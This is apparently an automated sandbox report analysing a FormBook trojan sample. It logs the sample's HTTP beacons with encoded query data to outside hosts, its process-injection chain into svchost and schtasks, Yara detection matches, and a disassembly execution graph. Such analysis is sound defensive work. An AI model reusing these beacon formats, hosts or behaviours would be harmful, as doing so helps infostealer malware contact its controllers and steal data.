                                                                                                                                  Data Ascii: DrelH=qxonD4gQFvLyTvTRuJF4m+5Kdg64lB999Iidm7oi3JmBMtcxV62e+68vfGENlFcRaqGycsPRa2b3ZWAFQC3NRDZ9Dm66xQ//X95ihjalepzwvtyZpX4wXFhUp4J6De3Gh1aIgg9WUB75CojIqDytfDdlJt0OMRJzghi3MsimnzpFUOAMOjWmrGYfKi9+Zm8RZYpKy32Q/fXkHGeBZQWUarIhILLyPwZI4XsaTOKMgcylhkXGp2hwW5q8gjzyAPVaekHGEp8uwtA5Hb0ZbAkuhyTyqjOIWiIGjBrOpxCqE9Oktzr3EmHbhlaMhJiH/c6XMBqMP35iuuKvv8ggUgrQ5EVJzBB3YPMqLUumLJ0szgSNm5AehJUfXDtlHKgE+9chVFnQM8G26KedwPG2FIaLGed3xs1M92US7Idmtv2+kb1t8V97vLJFrp8gDK7uWtwy0hNtc7thXjNv0JaSIKC1+wzEYy3opnwbQGHKIQoxIBJEGLirOgq1kplWefLCTozwxuX5c0PrSDZlBGckyVlcYDUugIIYB1P+aXPW9SM/tP722NSBlIgnXax+adLKo6D5H1A+5T0u8/YgUELc2hnElZsZsIRtpk75AeVuIqpxSs1ioq+QnsWqkdmMih/JRQqY1B3WDfgdOIgbvrWLSWSnOialGo5NFeqjOtY4MnhaxazG/PAFC8EgJhQbUIhu6V1cUdBL3yqfIOOoykAhV/4IRc7aY2W6uWnjvqUCyt/iL1Trelufnm594+DE5aP1NJM4b/9hYQBG8EuE+c++It4sWpLXtE0uP7wa14A9Wkf3x/JY3Dc4GGPiXliTKPhPIDs/C7l0I5vl2nxQCvMdwyp43FQMTSJY09zjrEmKmX4Vy+KgzXhUcdJDS6uwsarmBYP0LTLGIWr/uS4NDN4pX/yR0B0fYDb3ijC2cO7suBQozqiKYsCWFTaGkKwu5ZebnJ43ZW2gh2fUl113FJpuF5C1KSgx7RePfU32BVLqCSwEoD+i8D [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  52192.168.2.55325594.23.162.163801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 22:59:47.205121040 CEST489OUTGET /9vwi/?Sx=gnM4ZH&DrelH=nzAHAMVHTcHZef2dtsV+gZN2Jg+zshsJ+9OWn5ktx4T+L9EMDtm05+R8HUsMmhIjUd2KUuTNFTfuNiAYWk32ZlZ5K0mO0jPWZdMrvyGAaZ//vvCziC5VbEt1mIxURveK1Q== HTTP/1.1
                                                                                                                                  Host: www.productanalytics.pro
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 22:59:48.035028934 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:47 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 7468
                                                                                                                                  Last-Modified: Thu, 08 Apr 2021 14:34:06 GMT
                                                                                                                                  Connection: close
                                                                                                                                  ETag: "606f145e-1d2c"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 6f 64 70 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 20 70 65 6e 64 69 6e 67 20 49 43 41 4e 4e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 61 6e 64 20 69 73 20 73 75 73 70 65 6e 64 65 64 2e 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 65 79 2d 53 79 73 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp" /> <meta name="description" content="This domain has a pending ICANN verification and is suspended." /> <meta name="keywords" content="" /> <meta name="author" content="Key-Systems GmbH | CM" /> <meta name="publisher" content="Key-Systems GmbH" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/screen.css"> <link rel="shortcut icon" href="assets/img/favicon.png"> <title>Contact Verification Suspension Page</title></head><body><header><div class="overlay bright"></div><div class="container"><div class="heading"><div class="row"><
                                                                                                                                  Oct 22, 2024 22:59:48.035088062 CEST1236INData Raw: 68 31 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 75 73 70 65 6e 64 65 64 20 64 75 65 20 74 6f 20 6e 6f 6e 2d 63 6f 6d 70 6c 65 74 69 6f 6e 20 6f 66 20 61 6e 20 49 43 41 4e 4e 2d 6d 61 6e 64 61 74 65 64 20 63 6f 6e 74 61
                                                                                                                                  Data Ascii: h1>This domain has been suspended due to non-completion of an ICANN-mandated contact verification.</h1><p>As part of the ongoing effort to improve contact quality, the Internet Corporation for Assigned Names and Numbers (ICANN) requires
                                                                                                                                  Oct 22, 2024 22:59:48.035125017 CEST1236INData Raw: 6f 6d 61 69 6e 20 72 65 67 69 73 74 72 61 6e 74 20 68 61 73 20 62 65 65 6e 20 6d 6f 64 69 66 69 65 64 20 6f 72 20 63 68 61 6e 67 65 64 20 62 75 74 20 6e 6f 74 20 76 65 72 69 66 69 65 64 20 79 65 74 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 0d 0a 09 09
                                                                                                                                  Data Ascii: omain registrant has been modified or changed but not verified yet.</span><br>Changing the email address of the domain registrant requires a verification.</li><li><i class="fa fa-play"></i><span class="bold">The domain has recent
                                                                                                                                  Oct 22, 2024 22:59:48.035202026 CEST1236INData Raw: 76 20 63 6c 61 73 73 3d 22 69 63 6f 6e 5f 6c 65 66 74 22 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 68 65 63 6b 2d 63 69 72 63 6c 65 22 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09
                                                                                                                                  Data Ascii: v class="icon_left"><span class="fa fa-check-circle"></span></div><div class="slice_content"><p><span class="bold">Click the link provided in the verification email sent to you by your Registrar or direct service provide
                                                                                                                                  Oct 22, 2024 22:59:48.035238028 CEST848INData Raw: 72 2c 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 70 72 6f 76 69 64 65 72 20 6d 69 67 68 74 20 70 72 6f 76 69 64 65 20 74 68 65 20 72 65 73 70 65 63 74 69 76 65 20 74 72 69 67 67 65 72 20 63 6f 64 65 20 75 6e 64 65 72 20 63 65 72 74 61 69 6e 20 63 6f
                                                                                                                                  Data Ascii: r, your domain provider might provide the respective trigger code under certain conditions. This trigger code can be entered on <a href="http://emailverification.info/">http://emailverification.info/</a> to verify your registrant contact data
                                                                                                                                  Oct 22, 2024 22:59:48.035271883 CEST1236INData Raw: 65 72 69 66 79 20 72 65 67 69 73 74 72 61 6e 74 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 65 73 20 61 6e 64 20 63 6f 6e 74 61 63 74 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 69 74 68 69 6e 20 31 35 20 64 61 79 73 20 61 66 74 65 72 20 72 65 67 69
                                                                                                                                  Data Ascii: erify registrant email addresses and contact information within 15 days after registration and incoming transfers. If registrant data is not verified in time, ICANN mandates registrars to suspend the corresponding website of the affected domai
                                                                                                                                  Oct 22, 2024 22:59:48.035365105 CEST684INData Raw: 6c 61 73 73 3d 22 62 6f 6c 64 22 3e 48 6f 77 20 6c 6f 6e 67 20 64 6f 65 73 20 69 74 20 74 61 6b 65 20 75 6e 74 69 6c 20 6d 79 20 77 65 62 73 69 74 65 20 63 6f 6d 65 73 20 62 61 63 6b 20 6f 6e 6c 69 6e 65 20 61 66 74 65 72 20 74 68 65 20 73 75 73
                                                                                                                                  Data Ascii: lass="bold">How long does it take until my website comes back online after the suspension is removed?</span><br>After the verification has been successfully completed the suspension is removed within 30 minutes. Please keep in mind that
                                                                                                                                  Oct 22, 2024 22:59:48.375241995 CEST684INData Raw: 6c 61 73 73 3d 22 62 6f 6c 64 22 3e 48 6f 77 20 6c 6f 6e 67 20 64 6f 65 73 20 69 74 20 74 61 6b 65 20 75 6e 74 69 6c 20 6d 79 20 77 65 62 73 69 74 65 20 63 6f 6d 65 73 20 62 61 63 6b 20 6f 6e 6c 69 6e 65 20 61 66 74 65 72 20 74 68 65 20 73 75 73
                                                                                                                                  Data Ascii: lass="bold">How long does it take until my website comes back online after the suspension is removed?</span><br>After the verification has been successfully completed the suspension is removed within 30 minutes. Please keep in mind that
                                                                                                                                  Oct 22, 2024 22:59:48.375952959 CEST1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                  Date: Tue, 22 Oct 2024 20:59:47 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 7468
                                                                                                                                  Last-Modified: Thu, 08 Apr 2021 14:34:06 GMT
                                                                                                                                  Connection: close
                                                                                                                                  ETag: "606f145e-1d2c"
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 2c 20 6e 6f 6f 64 70 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 68 61 73 20 61 20 70 65 6e 64 69 6e 67 20 49 43 41 4e 4e 20 76 65 72 69 66 69 63 61 74 69 6f 6e 20 61 6e 64 20 69 73 20 73 75 73 70 65 6e 64 65 64 2e 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 65 79 2d 53 79 73 [TRUNCATED]
                                                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet, noodp" /> <meta name="description" content="This domain has a pending ICANN verification and is suspended." /> <meta name="keywords" content="" /> <meta name="author" content="Key-Systems GmbH | CM" /> <meta name="publisher" content="Key-Systems GmbH" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" type="text/css" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/font-awesome.min.css"> <link rel="stylesheet" type="text/css" href="assets/css/screen.css"> <link rel="shortcut icon" href="assets/img/favicon.png"> <title>Contact Verification Suspension Page</title></head><body><header><div class="overlay bright"></div><div class="container"><div class="heading"><div class="row"><


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  53192.168.2.553256188.114.97.3801536C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 22, 2024 23:00:04.581003904 CEST482OUTGET /qw71/?DrelH=+N/0E0v6NJCVb805MplOCuiY6zvMpGzoX4nqdcW8deD1xdZOlnbQg5vou9xNSSthlFMWUYds/nxA/0yqGkfxHl13RnV9fZ86lxbh4XUe9xgDJH4eQTI99hcUlaXwNdeqKg==&Sx=gnM4ZH HTTP/1.1
                                                                                                                                  Host: www.itemsort.shop
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US,en
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                                                                  Oct 22, 2024 23:00:05.305921078 CEST924INHTTP/1.1 404
                                                                                                                                  Date: Tue, 22 Oct 2024 21:00:05 GMT
                                                                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wUzmk3j2UlzYcPMXIRYSdG8TUWpcEAQq36sSUUHYznzPVSuRer2egvSHLcUNBDTNEV1qWAUFX4YIHJWfspQGD7OD5GvZGPjdZPiDbrPPrtYRGH4g8fIss2MS3Oz%2F8x%2BUI9R6qQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8d6c6a33fafae7f7-DFW
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=482&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                  Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                  Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>0


                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:16:55:58
                                                                                                                                  Start date:22/10/2024
                                                                                                                                  Path:C:\Users\user\Desktop\Doc 784-01965670.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Doc 784-01965670.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:1'321'247 bytes
                                                                                                                                  MD5 hash:F9D3E00CDE42773F49276BFD202813F5
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:16:55:59
                                                                                                                                  Start date:22/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\Doc 784-01965670.exe"
                                                                                                                                  Imagebase:0x9c0000
                                                                                                                                  File size:46'504 bytes
                                                                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2220515840.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2220815551.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2221191157.0000000004200000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:3
                                                                                                                                  Start time:16:56:08
                                                                                                                                  Start date:22/10/2024
                                                                                                                                  Path:C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe"
                                                                                                                                  Imagebase:0xc20000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4509677261.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:16:56:10
                                                                                                                                  Start date:22/10/2024
                                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Windows\SysWOW64\schtasks.exe"
                                                                                                                                  Imagebase:0x990000
                                                                                                                                  File size:187'904 bytes
                                                                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4509758397.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4508251164.0000000000440000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4508587001.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:16:56:23
                                                                                                                                  Start date:22/10/2024
                                                                                                                                  Path:C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files (x86)\KhDZcCQBVydFESkontNRZNbGMeSHxRZLKJUpkhVtgucIPUprTmPMEIsNuZGLdURQLGAQllcFP\jEsBIhfnof.exe"
                                                                                                                                  Imagebase:0xc20000
                                                                                                                                  File size:140'800 bytes
                                                                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4511141181.0000000005600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:16:56:35
                                                                                                                                  Start date:22/10/2024
                                                                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                  Imagebase:0x7ff79f9e0000
                                                                                                                                  File size:676'768 bytes
                                                                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  Disassembly

                                                                                                                                  Reset < >

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:2.9%
                                                                                                                                    Dynamic/Decrypted Code Coverage:2.4%
                                                                                                                                    Signature Coverage:3.9%
                                                                                                                                    Total number of Nodes:1416
                                                                                                                                    Total number of Limit Nodes:35
                                                                                                                                    execution_graph 84704 4444e4 84709 40d900 84704->84709 84706 4444ee 84713 43723d 84706->84713 84708 444504 84710 40d917 84709->84710 84711 40d909 84709->84711 84710->84711 84712 40d91c CloseHandle 84710->84712 84711->84706 84712->84706 84714 40d900 CloseHandle 84713->84714 84715 437247 ctype 84714->84715 84715->84708 84978 40f110 RegOpenKeyExW 84979 40f13c RegQueryValueExW RegCloseKey 84978->84979 84980 40f15f 84978->84980 84979->84980 84981 429212 84986 410b90 84981->84986 84984 411421 __cinit 74 API calls 84985 42922f 84984->84985 84987 410b9a __write_nolock 84986->84987 84988 41171a 75 API calls 84987->84988 84989 410c31 GetModuleFileNameW 84988->84989 85003 413db0 84989->85003 84991 410c66 _wcsncat 85006 413e3c 84991->85006 84994 41171a 75 API calls 84995 410ca3 _wcscpy 84994->84995 84996 410cd1 RegOpenKeyExW 84995->84996 84997 429bc3 RegQueryValueExW 84996->84997 84998 410cf7 84996->84998 84999 429cd9 RegCloseKey 84997->84999 85000 429bf2 _wcscat _wcslen _wcsncpy 84997->85000 84998->84984 85001 41171a 75 API calls 85000->85001 85002 429cd8 85000->85002 85001->85000 85002->84999 85009 413b95 85003->85009 85039 41abec 85006->85039 85010 413c2f 85009->85010 85015 413bae 85009->85015 85011 413d60 85010->85011 85012 413d7b 85010->85012 85035 417f23 67 API calls __getptd_noexit 85011->85035 85037 417f23 67 API calls __getptd_noexit 85012->85037 85015->85010 85025 413c1d 85015->85025 85031 41ab19 67 API calls __fptostr 85015->85031 85016 413d65 85021 413cfb 85016->85021 85036 417ebb 6 API calls 2 library calls 85016->85036 85019 413d03 85019->85010 85019->85021 85023 413d8e 85019->85023 85020 413cb9 85020->85010 85022 413cd6 85020->85022 85033 41ab19 67 API calls __fptostr 85020->85033 85021->84991 85022->85010 85022->85021 85027 413cef 85022->85027 85038 41ab19 67 API calls __fptostr 85023->85038 85025->85010 85030 413c9b 85025->85030 85032 41ab19 67 API calls __fptostr 85025->85032 85034 41ab19 67 API calls __fptostr 85027->85034 85030->85019 85030->85020 85031->85025 85032->85030 85033->85022 85034->85021 85035->85016 85037->85016 85038->85021 85040 41ac02 85039->85040 85041 41abfd 85039->85041 85048 417f23 67 API calls __getptd_noexit 85040->85048 85041->85040 85046 41ac22 85041->85046 85045 410c99 85045->84994 85046->85045 85050 417f23 67 API calls __getptd_noexit 85046->85050 85047 41ac07 85049 417ebb 6 API calls 2 library calls 85047->85049 85048->85047 85050->85047 85051 409030 85065 409110 117 API calls 85051->85065 85053 40906e 85054 42ceb6 85053->85054 85057 42cea9 85053->85057 85059 4090a4 85053->85059 85075 410ae0 VariantClear ctype 85054->85075 85056 42cebf 85074 45e62e 116 API calls 3 library calls 85057->85074 85066 404160 85059->85066 85062 4090f0 ctype 85063 4092c0 VariantClear 85064 4090be ctype 85063->85064 85064->85062 85064->85063 85065->85053 85067 4092c0 VariantClear 85066->85067 85068 40416e 85067->85068 85076 404120 85068->85076 85070 40419b 85080 4734b7 85070->85080 85124 40efe0 85070->85124 85071 4041c6 85071->85054 85071->85064 85074->85054 85075->85056 85077 40412e 85076->85077 85078 4092c0 VariantClear 85077->85078 85079 404138 85078->85079 85079->85070 85081 453063 111 API calls 85080->85081 85082 4734d7 85081->85082 85083 473545 85082->85083 85084 47350c 85082->85084 85132 463c42 85083->85132 85085 4092c0 VariantClear 85084->85085 85091 473514 85085->85091 85087 473558 85088 47355c 85087->85088 85105 473595 85087->85105 85090 4092c0 VariantClear 85088->85090 85089 473616 85145 463d7e 85089->85145 85099 473564 85090->85099 85091->85071 85093 473622 85095 473697 85093->85095 85096 47362c 85093->85096 85094 453063 111 API calls 85094->85105 85179 457838 85095->85179 85098 4092c0 VariantClear 85096->85098 85102 473634 85098->85102 85099->85071 85102->85071 85104 473655 85107 4092c0 VariantClear 85104->85107 85105->85089 85105->85094 85105->85104 85191 462f5a 87 API calls __wcsicoll 85105->85191 85119 47365d 85107->85119 85108 4736b0 85192 45e62e 116 API calls 3 library calls 85108->85192 85109 4736c9 85193 40e7e0 76 API calls 85109->85193 85112 4736ba GetCurrentProcess TerminateProcess 85112->85109 85113 4736db 85120 4736ff 85113->85120 85194 40d030 76 API calls 85113->85194 85115 473731 85121 473744 FreeLibrary 85115->85121 85122 47374b 85115->85122 85116 4736f1 85195 46b945 134 API calls 2 library calls 85116->85195 85119->85071 85120->85115 85196 40d030 76 API calls 85120->85196 85197 46b945 134 API calls 2 library calls 85120->85197 85121->85122 85122->85071 85125 40eff5 CreateFileW 85124->85125 85126 4299bf 85124->85126 85128 40f017 85125->85128 85127 